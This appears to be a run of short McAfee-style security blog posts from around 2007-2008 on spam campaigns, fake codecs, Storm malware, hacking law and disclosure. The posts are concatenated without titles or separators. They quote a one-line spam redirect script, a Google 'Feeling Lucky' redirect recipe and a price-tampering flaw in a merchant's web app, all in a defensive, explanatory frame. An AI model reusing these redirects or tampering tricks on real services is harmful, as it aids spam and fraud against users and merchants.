Consider Tom, a man who walks into a grocery store, and stops by the tomatoes. He gets the impulse to pick up a few of the mushy ones and hurls them at shoppers. Was this a targeted attack? I’m sure the headlines would read “XYZ Mart Shoppers Targeted by Tomato Mad Man,” but were they really? Those hit were simply in the wrong place at the wrong time; casualties of a random attack. Tom did not discriminate; he aimed for whoever was in proximity (if he aimed at all). If there happened to be five grandmothers nearby, this would still not have been a grandmother-targeted attack.

To bring this back to computer security, spammers often use massive address lists during campaigns. When spammers want to reach as many addresses as possible, they cast a wide net, sending messages to each address on the list–no discrimination, no targeted attack.

Consider a scenario in which an attacker discovers a flaw in Facebook. He may exploit that flaw to reach as many users as possible. Again, “Facebook users” were not targeted here, as there was no discrimination. The Facebook bug simply provided an opportunity.

Here’s a real-world example of a targeted attack. Select U.S. government contractors were sent email messages that contained exploited PowerPoint documents that install a remote-access Trojan on victims’ systems. Here “select U.S. government contractors” were singled out; not “government contractors,” not “email users,” not “PowerPoint users,” and not “Microsoft” (maker of PowerPoint).

In my Facebook example one could argue that the Facebook company itself was targeted; someone had to discover and exploit a flaw in that scenario to get to the user base. However, in my targeted U.S. government contractors example, few would consider Microsoft the target of that attack. The PowerPoint vulnerability was simply the means to an end, providing an opportunity.

Let’s look at another type of attack.

Some publicized targeted attacks used personal information. Potential victims may receive an email message containing not only their names, but also places of business, and possibly their titles, addresses, or phone numbers. Does that make these attacks targeted? Not necessarily. Yes, these are context-aware or personalized attacks; but without discrimination, these should not be considered targeted.

Other attacks rely on applications typically used by a segment of the population, such as music or video players, or social-networking sites. Does this mean that segment is targeted? Those users may be at a greater risk of being attacked, but that does not make them targeted. Accordingly, malicious fake video codecs and the like do not necessarily target home users!

Why Target?
In an effort to keep this blog from getting too long, here’s a short list of why attackers might keep an attack targeted:

• To keep a low profile for the malicious code (an effort to evade/delay malcode detection by flying under the radar)
• To keep a low profile for the entity behind the attack (an effort to evade prosecution)
• To minimize “casualties of war” (most attackers don’t really care if innocent bystanders get infected, but some small segment likely does).

Asking the questions why and how the XYZ attack was limited can help determine if the attack was indeed targeted.

What’s Really the Target?
Another litmus test when attempting to validate a targeted attack is to ask: What is really the target? If the answer is any and every username and password the attackers can get their hands on, then the attack is probably not targeted. We often hear about a bank being targeted in a massive phishing attack. Although such an attack may have been geared toward users of a single bank, one must ask Why? Imagine, how effective would a single phishing campaign be if a spammed email message listed dozens of banking sites and asked users to click the link for their banks? And if the attacker must limit the phishing messages to a single bank, one could consider this to be a process of elimination, and elimination does not equal discrimination.

I can appreciate the challenge the media face when writing the headline for an attack that affects only a segment of users. It’s just unfortunate that the term targeted is so overused that estimates of the problem can greatly vary.

Straight out of science fiction? Sounds like it, but it may be closer to reality than you would think.

Recently a bunch of researchers from the University of Washington and the University of Massachusetts, (plus a Harvard MD and a University of Washington Phd) were able to hack a pacemaker/defibrillator.

Think about this for a moment…they were able to make the device stop.

They released the report on their Web site dedicated to medical device security. Very interesting stuff.

Under the hood (so to speak – it was actually on a table) they found that they were able to connect to the device wirelessly, and cause it to shock on command and even to stop altogether. Almost secondary at this point, they were also able to glean sensitive patient information stored on the device.

Exploit scenario’s for this are better left to more deviant-minded individuals, but the net effect is obviously very serious. (When’s the last time your server went post-mortem – literally- from a flaw?)

So here’s the coolest part to the story:

They have examples of how to fix it! How many times have you seen a researcher release details of an exploit and not suggest how to fix it (aye, irresponsible disclosure)? They have taken account of the device designs (wireless transmission) and limitations (battery power) and have suggested ways that device makers could improve the security. Kudos to them! Hopefully this will spark a growing industry to make these devices safer.

One last thought here… would it not be surreal if a computer virus transcended the electronic world and actually infected a human being?

Microsoft’s OneCare team issued an update on January 31, 2008 that resulted in SiteAdvisor users receiving a Microsoft warning message recommending that SiteAdvisor be removed due to interference with OneCare.

SiteAdvisor doesn’t interfere with OneCare in any way; we communicated this to Microsoft and they’ve begun to resolve the issue.

As of February 21st, new installations of OneCare will not message against SiteAdvisor. However, existing users of OneCare will continue to receive these messages until sometime in the spring, when Microsoft says it will fix OneCare installations made prior to February 21.

Turns out that as a general rule, Microsoft recommends running only one security application at a time because of potential performance and “PC stability” issues. We explained to Microsoft that SiteAdvisor functionality is totally unrelated to OneCare. They agreed.

Rest assured, there is no need to disable SiteAdvisor or OneCare. The two products co-exist nicely (aside from the pop-up!).

Because OneCare doesn’t allow white listing of applications, affected consumers have limited options until all installations of OneCare are patched. Thanks for your patience during this time.

Last night I shared about how Ryan and I went through most of the challenges in Applied Security’s HackIT 2.0 contest at ShmooCon 2008 with the group at AHA! I spoke about how we approached and solved most of the challenges, and I thought I would share the process with whoever else was interested. I posted an informal report describing the methodologies and how to run/use the tools that we employed during the contest. The report is located on AHA!’s wiki, so if you’re interested, it’s located here on the meeting page. There is also a link to a PDF report if you want to take it off line. Also, if you are in Austin, Texas, (or the surrounding area) you should check out AHA! We get together and present as many short DefCon-style talks as we can before we get kicked out of Mangia Pizza. We share a lot of interesting/fun/useful ideas and information with each other. Plus, if you are a remote worker, it’s nice opportunity to get out and meet other “hackers” and shoot the breeze. We are a very welcoming bunch, but if you do come, be prepared to present.

Whilst the masses stay vigilant to “love” attacks [1][2][3][4] in the run-up to Valentine’s Day (tomorrow, don’t forget!), others, including McAfee Avert Labs, are wary of further hybrid spam and malware attacks. This morning we received thousands upon thousands of “Google Ad link” samples via our anti-malware and anti-spam automation systems.

A topical social-engineering trick highlights the race to the White House [5] for the Hillary Clintons and Barack Obamas of the world. It’s actually surprising we didn’t see more of this attack yesterday–the week’s anniversary of Super Tuesday [6].

The spam email (example below) contains a link (hidden by HTML [7]) that points to Google’s page-ad service passing another URL–a malicious one–which effectively redirects your browser to a site hosting a protectively detected Downloader.gen.a [8] sample. The site used in this attack is suspected to be linked to the notorious Russian Business Network (RBN) [9].

Other examples of this spam included some of the following subjects:

• Hillary Clinton Full Video !!!
• Interesting dvd with Beyonce + 4 asiatic lovers!
• Interesting dvd with Jennifer Lopez + 5 english boys!
• Interesting mp3 with Beyonce + 5 portuguese horse!
• Interesting photo with Mylene Farmer + 6 black stallions!
• Interesting video with Keira Knightley + 2 black dogs!
• Keen melody with Christina Aguilera + 4 english boys!
• Keen photo with Britney Spears + 4 asiatic stallions!
• Kick-up mp3 with Christina Aguilera + 5 irish mans!
• New melody with Kylie Minogue + 3 spain dogs!
• New presentation with Mylene Farmer + 6 portuguese lesbians!
• Part of presentation with Jessica Parker + 6 black dogs!
• Shocking photo with Jessica Parker + 3 italian horse!
• Stunning presentation with Beyonce + 3 black stallions!

We urge you to be vigilant and keep your anti-spam and anti-malware protection up to date. Remember, if it sounds too good to be true, it normally is.

[1] : http://www.publicopiniononline.com/localnews/ci_8249998
[2] : http://blogs.knoxnews.com/knx/silence/archives/2008/02/valentines_day.shtml
[3] : http://www.nbc13.com/gulfcoastwest/vtm/news.apx.-content-articles-VTM-2008-02-13-0006.html
[4] : http://press-releases.techwhack.com/16498/microworld-technologies
[5] : http://www.independent.co.uk/news/in-the-news/race-for-whitehouse
[6] : http://en.wikipedia.org/wiki/Super_Tuesday
[7] : http://www.avertlabs.com/research/blog/index.php/2007/08/20/the-risks-of-html-formatted-e-mails
[8] : http://vil.nai.com/vil/content/v_142821.htm
[9] : http://www.securecomputing.net.au/news/69637,britney-paris-used-as-hook-in-new-spam-botnet.aspx

This month, McAfee Avert Labs will release our third issue of our security journal “Sage,” which in this edition examines regional issues in security and malware in different parts of the globe. Here at Avert Labs we’re reacting to these trends by reorganizing to more effectively deal with those local and regional challenges. In that vein, I’m proud to announce that Guy Roberts has been named as Avert Director of Operations for EMEA (Europe, Middle-East, and Africa). Normally we talk only about security threats and trends on the Avert Labs blog, but this is a special occasion.

Guy will be responsible for all anti-virus and anti-spam operations for all of EMEA. Guy has been working in the AV industry for more than 10 years on products for desktop, gateway, and management and has a broad understanding of customer’s needs. He has also been responsible for turning the McAfee anti-spam technology into an industry-leading messaging solution.

Guy will bring a strong customer focus into the region for Avert Labs as well as continue to help advance our detection and coverage across all technologies!

I’ve been fascinated by a couple articles by Cory Doctorow on the difficulties inherent in the popularity of Social Networking sites like Facebook, and the differences between “Myware” and “Spyware”. There’s a lot of food for thought here, primarily regarding the difficulties in assessing another entity’s intent.

As someone who tries to assess intent for a living, I’m immersed in this difficulty on a daily basis. Even if an application developer has a perfectly legitimate intent, the person who is using the application may have another purpose entirely - is the program built such that it can prevent such unauthorized use? This sort of dilemma is what led to the classification of “Potentially Unwanted Programs” - either a program’s original intent falls too far into the grey area or we see an instance where a clearly helpful administrative application is being used in a way that is clearly malicious in intent.

Instances like the XCP Sony DRM rootkit and Sears’ use of the Comscore application really underscore the problem. From the companies’ perspective, they’re doing something perfectly reasonable and harmless to the user. People who find these applications on their machines may feel otherwise, and they may feel that the applications’ actions are inadequately documented or simply intrude too far into the user’s privacy.

The privacy line gets even thinner and more blurry with Social Networking sites, where a certain lack of privacy is inherently part of the equation and generally considered desirable. You can share personal information, pictures, music taste, etc. with all your friends, in one simple, efficient maneuver. It seems perfectly reasonable and simple, given the assumption that “friendship” is a simple black and white matter. Few things in life are ever so simple.

A friend of mine recently joined a Social Networking site, thinking it would be all about that simple, efficient sharing maneuver. She put all her contact information up, and made it viewable only by her friends. What harm could there be in that? (I talked her into removing it a few minutes later.) Fast forward to a few days later, when she received a friend request from someone in her past that she’d had reason to fear for her physical safety with, once upon a time. She had absolutely no desire to be in contact with this person, but there was no way for her to completely block this person from viewing her profile, and for various reasons she felt unable to reject the request directly. She’s more or less given up on this site as a result of that incident. Thank goodness she’d already removed her contact info!

There really is no simple solution to the problem of the thin, blurry line of privacy. There’s no silver bullet that will magically make everyone’s internet experience totally warm and fuzzy. I think the most important thing to take away from this is that we need to constantly be vigilant about maintaining our right to privacy, and to push companies to give us the granularity that lets us decide when and with whom we’ll share our information.

“If its free and worth abusing, discovery time is the variable these days.”
(Or rather… spammers are the bane of free services…)

Our labs trapped many thousands of spam overnight that are abusing the Windows Live SkyDrive Beta service launched in August last year (or rather it’s the new name for Windows Live Folders…). The service allows you to upload up to 1Gb of files and share them with anyone via weblinks. The trapped pill spam promises the usual assurances:

We sell only fda prescription medicine through our fully licensed
pharmacy. orders are overseen by licensed accredited physicians.

http://hostname.bay.livefilestore.com/..Long-url…/adv-filename.html

{english textual bayes poison}

The payload is an html file with just one line of HTML at the moment, that redirects your browser to the current incarnation of spammers pill-serv:

<html><body><script language=JavaScript>window.location.replace(
"http://top10epharms.com“)</script></body></html>

We’d expect this to change to obscured script or meta redirection in the not to distant future.

It’s not just spam either, the technique has also been spotted in the labs on blogspot splogs too.

So what makes services like these worth abusing and attractive to spammers?

• Unique urls
• Domains relatively safe from blacklisting
• Link longevity
• abuse handling issues
• Features - host *almost anything*
• Great Price
• Someone else pays the hosting costs

It’s a great value proposition for abuse isn’t it? Well not really, it the same proposition as just about ever other file sharing service out there, this one just got hit, big, suddenly. Another interesting point is the number of times we trapped each url was interestingly low for such a big campaign, I’d therefore estimate they had tens of thousands of files uploaded. We’ve seen a few small scale spam using SkyDrive service dating back to November last year but were on an much smaller scale to last nights campaign. I’m sure it won’t be too long before it’s used to host other unwelcome content types I’d like to see more of these online file storage offerings malware scanning downloads too.

They have a pretty good terms of service document that this spammer is clearly in breach of. I will be honest and say that I am not going to fill out an online abuse form for every individual url though! SkyDrive folks - feel free to get in touch if you’ve not had enough reports

If you try SkyDrive be sure to leave feedback and suggestions here and here, it looks very neat so far.

The upgradation of the UK’s computer crime laws is in progress and one of the new amendments proposed under the Computer Misuse Act is about making the creation and distribution of so called “Hacking Tools” a crime. There are strong criticisms coming from the security industry as many such tools that can be used by bad guys for breaking into a system are also used by good guys to test their systems for security. For example, a network sniffer can be used for eavesdropping as well as for trouble shooting a network. It depends on the context the tool is being used and marking any such tools as “hacking tools” and making them unavailable for distribution can hinder the work of system administrators and vulnerability researchers. These amendments are not in force at present and may be applied later this year.

After much concerns raised by the industry, the government is considering a few of the concerns and is recognizing the “dual use” status of a few such tools. It would need the prosecutor to prove that the author wrote the tool with malicious intend to prove him guilty, but the distribution of such tools may still be considered as crime. The Crown Prosecution Service will look for answers to the following questions for proving someone guilty or not:

- Has the article been developed primarily, deliberately and for the sole purpose of committing a CMA offence (i.e. unauthorized access to computer material)?

- Is the article available on a wide scale commercial basis and sold through legitimate channels?

- Is the article widely used for legitimate purposes?

- Does it have a substantial installation base?

- What was the context in which the article was used to commit the offense compared with its original intended purpose?

The following sources were used as my primary information source:

The Register, LightBlueTouchPaper and CPS.

IT laws can always be tricky to write and implement, and this law surely will raise many eyebrows. Thought it may help bring bad guys to justice, it will also make legitimate good guys nervous to create new tools and distribute them.

A few weeks back we blogged about malware-laced codecs embedded in various Blogspot domains. Today within hours after the assassination of former Pakistani Prime Minister Benazir Bhutto, malware authors have started capitalizing on this news to spread a new fake codec. This time it is purported to be an assassination video of the former PM.

Claiming to be a New HD Codec, these malware authors attempt to social engineer users into believing they are downloading a legitimate codec for playing the video. At least 10 Blogger websites are observed to be hosting this fake video (at the time of writing this blog) which redirects the users to the typo-squatted domain containing fake codec:

http://video.googl.[removed]

Malicious code hosted on the 3322 domain is not something novel. One of the recent high profile attacks which pointed to a malicious script from the 3322 domain was the Indiatimes Mail hack.

There are a plethora of websites which attempt drive-by installations when unsuspecting users visit websites returning search engine results for “Benazir Bhutto”. Many of these compromised webpages have malicious scripts injected into the webpage which points to the 3322 domain. These webpages contain obfuscated variants of the MS06-014 exploit which is perhaps one of the most popular of all the exploits we see on a daily basis.

This fake Trojan Codec is detected by the current DATS as Puper. The downloaded exploit is detected as VBS/Psyme and the executable is detected as Generic Downloader.c

(Credits to Pradeep Govindaraju for the great malware analysis)

Spammers have been abusing free hosting for a long time. Yahoos’ Geocities was pretty heavily targeted in its day and more recently Googles’ Googlepages and blogspot are the abused services of choice. The general idea being spammers can get 1-20+ thousand accounts a day with unique urls and point them at a handful of spammed domains that they had to pay for.^[1] It’s improbable that any external party can compile a complete list of the abused accounts, report them to the host and the host engage somebody cluefull 24/7 to take-down the sites in any reasonable time period to make the spammers campaign ineffective.^[2]

I know, I’ve tried!

Those of you that read this blog a year and a quarter ago will remember that the metric truckload of accounts are often provided as a paid service to spammers if they are not able to perform the required tasks in house.

- Spammers have also been abusing the free blog services for a long time. (and setting up their own fakes)

- Spammers have also been abusing the free tiny url services for a long time. (and setting up their own fakes)

There is a common theme here! Free services that allow or facilitate blind redirection. It’s all about getting emails through and links in front of victims and as a rule of thumb, the more popular the service you abuse the less likely it is to blocked by the blacklists. Surbl have an open letter to redirection services, if you want some more education on the subject from the blacklist prospective. ^[3]

It’s no surprise that the next popular service to be abused is the search engines. To be clear, I’m not talking about Spamdexing (manipulating text for high search index rankings) or SEO dirty tricks, but (ab)using a search provider as a redirector by using the more advanced search options combined with “Feeling lucky” features that take you to the top search result.

I’ll dissect this mornings sample for you noting one additional point:
- Spammers have also been abusing the free webmail services for a long time.

A quantity of Yahoo webmail spam kindly deposited its self in one of our many millions of spamtraps, DKIM signed, SPF passed Etc, Etc. Inside it was a link to a “feeling lucky” link c/o rival search giant Google.

Abused Search Host: http://www.google.com/
Search Function: search?q=
Search Feature Text in the URL: inurl:games-pro
Search Feature Text int he page: intext: won1 million megabet from casino online ^[4]
Search Invisible Redirect Feature: btnI=Lucky

If you put this lot back together you’ll get an invisible redirect (302) to casino-games-pro that’ll try and auto-install the CasOnline PUP. Charming.
I’d like to point out here that if you try to send a spammy link out via yahoo webmail they captcha test the sender. (but they also did that when the accounts were setup, right?) The trick here is the fact that there is nothing spammy about a search link. I have no doubt that /btnl=Lucky/ will be hitting the filters at Yahoos webmail HQ very shortly if it hasn’t already.

The “Feeling Lucky” spam technique is not particularly new, but this webmail twist does show the relentless diversity of spammers abuse of free services provided by the big players alongside their abuse of the smaller fish that Kevin blogged about the other day. As he pointed out, the spammers are using the phishers techniques, how long before we see “btnI=Lucky” in phish.

All of these methods are popular because it’s not really possible for RBLs’ or URIBLs’ to block them without collateral damage to innocent sites making it more likely that spammers links will get through to the inbox. Though when the abuse is more than background noise things do happen.^[5]

^{[1] Lets assume for ease they actually do pay, in reality it’s stolen card & credentials sample from some carder IRC channel.
[2] Testing a random Googlepages link spam from last month shows that everything is still working.
[3]For the record many shorter-link services took notice rapidly!
[4] Yes I linked ” won1 million megabet from casino online “ - so what? I really do hope this blog helps.
[5] Tale a look at SBL60999.}

Tis the season to be shopping, tra la la la la but don’t get had.

I’ve stumbled upon a scam where search engine product listings are being (ab)used for the classic (”#1 auction site”) +postage scam. Most auction sites have some jokers with good value items with ridiculous postage or compulsory insurance to even the score. Credit where it is due, the big boys are clamping down on unfair charges, but it’s still pretty common for listings to include excessive additional charges; £13 to post a memory stick locally (almost twice the price of the item itself), or £38 to post a Wii.

The scam works like this:

You search for a gadget on your favorite search engine’s products section and as normal you’ll see those highly relevant and usually high commission links on the first page. Like most people, I’m sure you’d have gone to the high street to pay hight-street prices, so the first click is to sort by price. Scrolling past the pages of adapters and cases (if you wanted a case or adapter you’d have searched for it after all) you’ll eventually find the holy grail, the page containing the lowest price actual product you searched for.

It is not uncommon to find many web-based storefronts for the same white label box-shipper, so new stores with juicy offers crop up every day. Since you’re an astute shopper, you’d investigate the first couple of links, knowing that your about to save about 20% or so.

When visiting the site indicated we see that the price is invitingly lower still than the one displayed by the search engine. Bargain!

^{[ Click for full image - This site is flagged by SiteAdvisor due to misleading offers ]}

…along with the somewhat unusual text “Subject to change”, anyway £4.20 is £4.20 so we decide to click to buy now.

^{[ Click for full image ]}

£300 is the total, right up there in the top right of the PayPal page. If your PayPal credentials were stored in your browser that login button would be your destination. If you happened to be logged in to PayPal the blanks in the form would have been all filled in too. If you were in a rush (and who isn’t at this time of year) I’m sure that would have been easily missed.

“Subject to change” hardly covers this one. Just to pour salt on the wound, the actual Post and Packing sting comes on the last page, and after you’ve logged in.

^{[ Click for full image ]}

£1200! Caveat Emptor people…”Let The Buyer Beware”
- Merry Christmas one and all.*

A self-proclaimed Mac user is targeting Mac fan blogs. He has already defaced 2 famous Mac related blogs.

http://www.applematters.com/

http://iphonematters.com/

In his own words ” I’M A MAC USER. I JUST HAVE A STRONG DISTASTE FOR MAC SYCOPHANTS.”

This is possibly the first time a hacker is targeting Mac related websites. This is interesting month for the Mac user base, with multiple Trojans/malware appearing along with a horde of security updates from Apple itself.

Things are definitely heating up in Mac Land!

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Update Nov 28th <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

Seems that this defacement may in fact be a hoax:

http://www.applematters.com/index.php/section/comments/sincere-apologies/

http://www.applematters.com/index.php/section/comments/a-bad-pr-stunt/

http://www.glennwolsey.com/2007/11/28/what-really-happened-sincere-apologies/

Pretty odd any way you look at it. Also after a bit more digging we came across another Apple defacement (there are a few more with some Googling):

http://networks.silicon.com/webwatch/0,39024667,39158606,00.htm?r=1

There’s a lot of hype circulating around about a Jihad application meant to wage cyber war in the near future. A lot of people have speculated and while the experts are dismissive, the topic is still getting a lot of press and worrying average users. I took a bit of time to examine the binary and I don’t believe it poses a huge threat. Here are my reasons why:

1. The program is written in Visual Basic. While there’s nothing wrong with that, VB is not the preferred programming language of very many professionals. C\C++\C# would tend to be better choices for complicated and efficient programs. VB tends to be a language for quick applications or for those beginning programming.
2. There is a tracking website required to use the application. Terrrorists don’t like to be tracked. Further, the site tracks referrals – thus it would be trivial to create cliques of users, which again is something terrorists would be desperate to avoid.
3. The website variables are in English. Extremists/Islamic Jihadists tend to not speak English, remember all the stories about the few English speakers they use? These guys have some understanding of English – indicating they might not be the stereotypical terrorist.
4. The web url is hard coded and it’s to a real web server. We’re in an age of dynamic dns and fast flux. A static/real url is very amateur and easily blocked.
5. There didn’t appear to be capability to dynamically update the program remotely – this would be key for updates and avoiding being blocked. I did a VERY QUICK analysis, but didn’t see this capability.
6. The executable wasn’t encrypted and didn’t fight malware analysis – real malware writers love to do malicious things to AV guys. They weren’t in this executable.
7. The webserver had frontpage extentions – this again just seems out of place for cyber war.

All told, the little bits of analysis make the code look to be written by high school or early college kids. If their network gets large enough, maybe they could have caused harm. Right now the websever isn’t working and the app seems like a no-go. I’d suggest everyone block traffic to the server http://al-jinan.net and stop worrying.

All companies, software, and websites need to have a clear means of receiving information about vulnerabilities. Every application has vulnerabilities and sometimes 3rd parties just happen to see them. I was using a Web App for a local diamond dealer. Clearly they deal with a high value product that should be well protected. While I was browsing the site, I noticed that it appeared to use GET requests to pass item and price information. It turns out that the two aren’t cross verified on the back end — it was possible to change the price. Maybe they have internal processes to verify the price, but maybe not. Likewise, if an evil attacker uses the vulnerability, is the merchant bound to the price they charged the credit card? They also allowed negative prices. Would the 3rd party credit card servicing site happily provide a charge back?

I’ve tried to contact the merchant, but I just can’t seem to get through to anyone that understands the problem. I only want someone that understands the potential problem to be aware of it so that they can accept the risk or go about fixing it. So New Rule, if you have an application (web or otherwise) you MUST have a clear means of receiving vulnerability information.

As a brit I’ve always predicted that with the upcoming US elections the online battle will be the most interesting part for me (aside from the comedy of course). So imagine my surprise when I’m greeted by this lot over the weekend:

Subject: Ron Paul Eliminates The IRS!

Subject: Iraq Scam Exposed, Ron Paul

Subject: IRS Fears Ron Paul?

Subject: Ron Paul Wins GOP Debate!

Subject: Ron Paul Exposes Federal Reserve

Etc.

They all linked YouTube searches for “ron paul” which results in the usual electoral propaganda you’d expect 372 days before an election.

Later in the day it changed however. With the usual addition of bayes poison, randomness in the subject lines and a tinyurl and no doubt some additional sending resources since they just burned a load, this campaign moved up a gear.

Subject: Ron Paul Wins GOP Debate! ydB

Subject: Ron Paul Wins GOP Debate! XZHMuk

Subject: Iraq Scam Exposed, Ron Paul qCnUa

Subject: IRS Fears Ron Paul? edukDy

Subject: Who Is Ron Paul? lyI

Subject: Ron Paul Stops Iraq War! nALGU

This is trivial stuff as I’m sure you can appreciate, but that tinyurl did catch my attention:

tinyurl 345s6g -redirects-> 301 Moved Permanently -to-> http://www.youtube.com/watch?v=AeHWW5gbc0w

“This video has been removed due to terms of use violation.”
Now I have no idea what that video was (and frankly dear, I don’t give a damn!) but what struck me is that this would be a really efficient way to remove your competitions videos from youtube. I’m not picking on YouTube here, I believe almost any social site would do the same.

There are 2 people I feel for in this messy situation: postmaster@*.gov and abuse@youtube.com
You’ll be seeing lots of this stuff in the coming months, the most worrying of which will be the false donation solicitations and finishing with incorrect dates for actual polling day!

I wonder how many candidates have EV certs? or “security logos” on their donation sites.

We all know that Nuwar aka Storm gang has been continuously changing their spam email text, download sites, executables, network traffic patterns etc in their efforts to penetrate through the security defenses at various layers, all throughout this year. I had a chance to briefly look at a ‘fresh’ Nuwar sample this weekend. It is interesting that they have now also changed the names of files Nuwar drops. It now drops noskrnl.exe, noskrnl.sys and noskrnl.config instead of Spooldr.exe, Spooldr.sys, and Spooldr.ini correspondingly. It also tried to actively propagate by coping itself on the floppy drive, which is new.

It is not the first time that the names of dropped files have been changed (it used to be wincom earlier this year) but it did not change in the past few months. Users, especially those who use system diagnostic tools, should exercise caution in distinguishing noskrnl from the legitimate ntoskrnl.exe. Perhaps spooldr had become too well known for author’s comfort, search results for spooldr clearly indicate what it is but not for noskrnl for the time being. Anyways, we detect these as Tibs-Packed.

It seems that today someone invented a new way of fighting spam. The idea is simple—scare spammers to death by circulating a hoax that one of their ilk has just been murdered! It would not take long for people to conclude that such a poor fate might be related to the professional activities of the deceased. The following blog appeared today on one of the anonymous sites and immediately got wide attention:

To reinforce the story they even included a reference to a real story back from 2005 when the most prolific Russian spammer—Vardan Kushnir—was killed in Moscow. There is a big “but” here though. The widespread belief that the murder of Vardan Kushnir in July 2005 was related to spam distribution collapsed after the real killers were detained one month later. It’s ironic, though perhaps typical of how media works, that unfounded speculations received much wider publicity than the facts that became available once the murder case was closed.

As much as we at McAfee Avert Labs would like to reduce the level of spam, we just have to conclude that spammers can still sleep well at night.

Organizations have traditionally blocked outbound Simple Mail Transfer Protocol (SMTP) traffic on port 25 that originates from the local area network (LAN) and virtual private network (VPN) segments. This is done to prevent any internal machine that has been infected with a mass-mailer from spamming the outside world. Email can be traced back to its origin via ip address information contained in the mail header, and no organization wants to be held responsible for spreading malware onto the internet – it would be a public relations nightmare.

By blocking port 25 at the firewall, an organization prevents a mass-mailer from spreading. However, by blindly blocking outgoing SMTP traffic, valuable information on real-time internal infections or data leakage arising from threats that use port 25 is lost.

In this month’s Oct 2007 edition of Virus Bulletin, we proposed the need for an in-house SMTP honeypot. A copy of this article titled “The need for an in-house SMTP Honeypot” can be downloaded from our McAfee Avert Labs Technical White Papers page.

Simple Mail Transfer Protocol honeypots have traditionally been used to masquerade as open-relays in order to frustrate spammers and harvest spam. With changed spammer tactics over the years, it is high time we revisited traditional countermeasures and improved upon them.

Thought I’d pass along some Friday giggles to take you all into the weekend.

In a former job-incarnation I was a florist, which has left me with certain plant geek tendencies. It’s very rare for my security-geek and plant-geek worlds to cross, but today they did. Apparently certain plants which grow by underground runners (or “stolons“) use those connections as sort of an Instant Messenging platform.

On the plus side, if one plant is attacked by caterpillars, the rest will fortify themselves against attack. On the minus side, if one plant gets infected with a virus, so will the rest of them.

Clearly clovers lack the resources for a proper layered defense strategy.

Maybe they’re not up to date on their software patches or security updates. …Or maybe they’ve been falling for clover-social engineering - some mischevious clover sending nasty links by IM.

They say bad news comes in threes, and it would seem virus writers are the ones getting the bad news right now.

In the last month we’ve seen arrests and a conviction related to two malware families, Downloader-AAP and W32/Fujacks. Now there’s been an arrest and indictment of an alleged botmaster, related to the DDoS attack on CastleCops. Certainly not such smooth sailing for malware authors these days!

On the other hand, it does seem that cybercrime is still pretty lucrative, as long as you don’t mind being incarcerated or monitored by government agencies for a while. The Fujacks author apparently has a very lucrative job waiting for him when he finishes his sentence, and three men who were recently fined by the FTC for surreptitiously distributing adware, will apparently be keeping $3.2 million in profits from their underhanded activities.

While we haven’t won the war against malware authors by a long shot, it certainly seems that a few big battles have been won recently. Hopefully this trend will continue, and being a malware author will become more and more risky and less lucrative.

What is antivirus protection worth when users try all the tricks they know to see the Loveletter.jpg.vbs picture; why do they double-click on executable files? No matter whether it’s Kournikova, Labor Day greetings cards, or just an “undeliverable message” with “details” attached, many users don’t care.

Home users risk their privacy and may lose the ownership of their machines, but they can’t resist the temptation.

Corporate users are sometimes even less careful, as it’s not their machine and if it’s broken, it’s not their problem. The IT department will fix it.

“If the company sends the mails to my machine, they know what they are doing. Why shouldn’t I click on those mails?” I heard that once from a corporate user–it scared me, because it was that user who was causing an internal outbreak.

While that user enjoyed the weekend, the IT guys tried to regain control of their network. About 15 employees of that company were working the whole weekend, plus external consultants.

That was one of the most expensive double-clicks that company ever had.

Is it that hard to think twice?
Don’t users know enough about risks?
Don’t they know about the consequences of an outbreak?

What have we learned from history?

C’mon, it’s not that hard.

Next time you receive an unexpected (mail)-delivery, think twice before you let it pass your last line of defense.

There’s been a video created by the Idaho National Laboratory which is intended to simulate the possible havoc that could be wrought by a hacker who had access to their antiquated, largely-unsecured equipment.

The thing that’s most interesting to me is not so much the video or the article but the reaction from people in the comments. It really runs the gamut from “I AM L33T HAX0R! I PWN YOU, PH34R ME!!!1!!!” to “OMG, doom!! Fix it now!” to “This is all a conspiracy cooked up by The Man to keep us in fear!” There’s one comment that I found particularly well thought out:

I work in the electric power generation industry and have worked at nuclear and fossil generator stations for 30 years. We have made many adjustments to our security regaurding computerized eguipment over the years and continue to do so. While any individual company is vulnerable to hacking, the nuclear industry has built in many safeguards and redundit systems to protect the equipment. Add to this the ability to overide and manually scram reactors it is highly unlikely hackers could effect the running of the plant. Where this country is vulnerable is with the power grid that transfer this power across the country. Many poeple do not understand how the grid works but, suffice to say the equipment is outdated and could be potentially harmed by hackers. This is where we should have our attention right now because this has the ability to effect all of the country.

Posted by:
vnvet68 7:44 AM

The last two sentences seem to really get to the heart of the matter - the equipment being used to power this country is fairly antiquated, and pre-date the internet as we know it, by quite some time. Network security was obviously not considered when the power infrastructure was set up, and little thought is going to it still.

Clearly it would be possible to cause problems with the existing set-up. Would it be easy? Almost certainly not. It would require specific internal knowledge of hardware that is not commonly used outside the power industry. Does that mean we should ignore it or dismiss it? Absolutely not. A massive power failure even on a local level could have severe consequences, in terms of people’s safety and security, as well as in terms of economics. Such a disruption in a major city could potentially effect millions of people.

Consider how much effort has gone into securing airports - shouldn’t we be at least as concerned with our power?

In a follow up to our previous blog, the Chinese court system has convicted Li Jun to a 4 year prison sentence for authoring the W32/Fujacks virus on September 24, 2007. The W32/Fujacks virus (written in November 2006) spreads itself by infecting web pages, poorly secured file shares, and removable media amongst others. But the main objective of the W32/Fujacks virus is to download password stealers that were used to target online accounts.

During the trial, Li Jun’s lawyer attempts to show his value to Chinese society showing an offer letter from a networking company in Hangzhou that is interested in making Li Jun their CTO. His attorney goes on to say that he has received over 10 offers from different companies that are willing to pay Li Jun over 1 million China Yuan per year.

In his closing remarks, Li Jun’s lawyer was quoted as saying “A rare talent who is now regretful of his deeds and hopes to utilize his talents to contribute to society.”

So does the punishment fit the crime? A 4 year prison sentence does sound like a long time, but what will be more interesting is where Li Jun will end up once he has paid his time in prison. Of course, that’s assuming that he does indeed serve his full sentence of 4 years. The trial of Li Jun definitely sets a precedence that the lawmakers are willing to punish those who harm society whether it be via physical means or via cyberspace.

Sources:
http://www.chinacourt.org/html/article/200709/24/266397.shtml
http://www.changjiangtimes.com/htm/2007-9-25/59385.htm
http://english.people.com.cn/90001/90776/6270740.html

There are and always will be different views on security information disclosure ethics. Thus I will not argue in one direction or the other. I will instead bring up a case as a “food-for-brain” example.

Would you trust someone that auction for a CD that “will make a hacker of you in only a few hours“?

What if the same guy sells free tools to “steal usernames and passwords” and “Sniff out AOL conversations“. For only 7.99 pounds you can also buy a “Easy virus construction” kit and “Ready Made Virus“.

